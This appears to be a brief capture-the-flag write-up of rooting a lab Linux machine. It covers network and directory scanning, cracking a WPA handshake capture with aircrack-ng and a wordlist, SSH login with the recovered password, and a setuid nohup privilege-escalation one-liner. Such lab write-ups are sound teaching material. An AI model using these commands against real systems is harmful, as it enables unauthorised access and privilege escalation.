CTF Linux
Created At : 2022-06-26 23:48
Count:281 Views 👀 :2147
Netdiscover
sudo netdiscover
192.168.0.23
rustscan
rustscan -a 192.168.0.23
Output:
Port 80
gobuster dir -u http://192.168.0.23 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt
Output:
http://192.168.0.23/robots.txt
On some pages I have this error:
In the htaccess file I have this message. I think it’s a joomla server.
http://192.168.0.23/htaccess.txt
End - Joomla! core SEF Section.
Port 9000
I can use gobuster on this page because he return the error 500 (Internal server error).
gobuster dir -u http://192.168.0.23:9000 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt --wildcard switch
Output:
But:
Nothing interesting.
Port 8999
It’s useless to run the gobuster scan on this web serveur because we already have the directories. It’s like an index of/
page.
It’s an webfs/1.21 server with a cap file.
I have to open it with wireshark.
WPA-01.cap
This is a capture of a wireless stream, with the SSID: dlink
I have to use aircrack-ng to find the password in the cap file with a directory attack.
aircrack-ng -w Documents/wordlist/rockyou.txt /home/peanutstick/Downloads/WPA-01.cap
The password for the SSID dlink
is p4ssword
.
SSH
I can use the user dlink to login via SSH.
ssh dlink@192.168.0.23
Enum
Can’t check the .bash_history.
With lse.sh:
There is nothing in /usr/bin/TryHarder!
Uncommon setuid
https://gtfobins.github.io/gtfobins/nohup/
I can’t use the commmand with sudo.
/usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
I’m root.